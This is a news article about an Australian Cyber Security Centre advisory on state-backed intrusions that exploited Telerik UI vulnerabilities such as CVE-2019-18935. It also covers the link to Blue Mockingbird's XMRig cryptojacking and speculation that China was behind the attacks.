A recent report from the Australian Cyber Security Centre indicates that there is a vulnerability related to the attacks that cybercriminals are launching using cryptojacking malware. The security body said that a group of ‘state actors’ hacked various Australian networks on June 19. In that incident, they exploited a vulnerability related to the cryptojacking malware attacks.
These threat actors exploited four critical vulnerabilities in Telerik UI, according to the 48-page report released on June 24. One of the exploited vulnerabilities is the CVE-2019-18935 that was recently leveraged by the Blue Mockingbird malware gang. The gang used this strategy to infect thousands of systems with a Monero (XMR) mining software, XMRRig.
Weakness Mainly Used For Cryptojacking Activities
Although that advisory never said whether the hackers could have installed cryptojacking malware in the recent massive cyberattack, that vulnerability is the preferred method by the cybercriminals for installing all types of crypto-mining applications within corporate networks.
The report expounds on the CVE-2019-18935 vulnerability. Notably, the vulnerability has several similarities with the ones that appeared on the Blue Mockingbird’s attack. Nonetheless, it does not suggest that such gang participated in the cyberattack that was launched against Australia:
“Other exploit payloads were identified by the ACSC most commonly when the actor’s attempt at a reverse shell was unsuccessful. These included: a payload that attempted to execute a PowerShell reverse shell; a payload that attempted to execute certutil.exe to download another payload; the payload that executed binary malware (identified in this advisory as HTTPCore) previously uploaded by the actor but which had no persistence mechanism; a payload that enumerated the absolute path of the web root and wrote that path to a file within the web root.”
Did Chinese State-Backed Hackers Launch The Attack?
About ten Chinese hacker groups have the PlugX malware among their weapons. These hacker groups engaged with espionage activities and supposedly have strong ties with China’s government. PlugX was among the malware identified in the Australian government’s report.
Several of the Australian officials believe that China could be behind the massive cyberattack. They suggested such a possibility citing the diplomatic issues that have been on the rise between the two countries.
It was believed that the attack could have come after Australia sought for an investigation targeting the origin of the COVID-19 virus. That investigation was not well received by the Chinese officials. China termed it as a ‘discriminatory’ accusation and responded swiftly with trade retaliation against the Oceanic country. But, the Chinese government has denied the claims of hackers.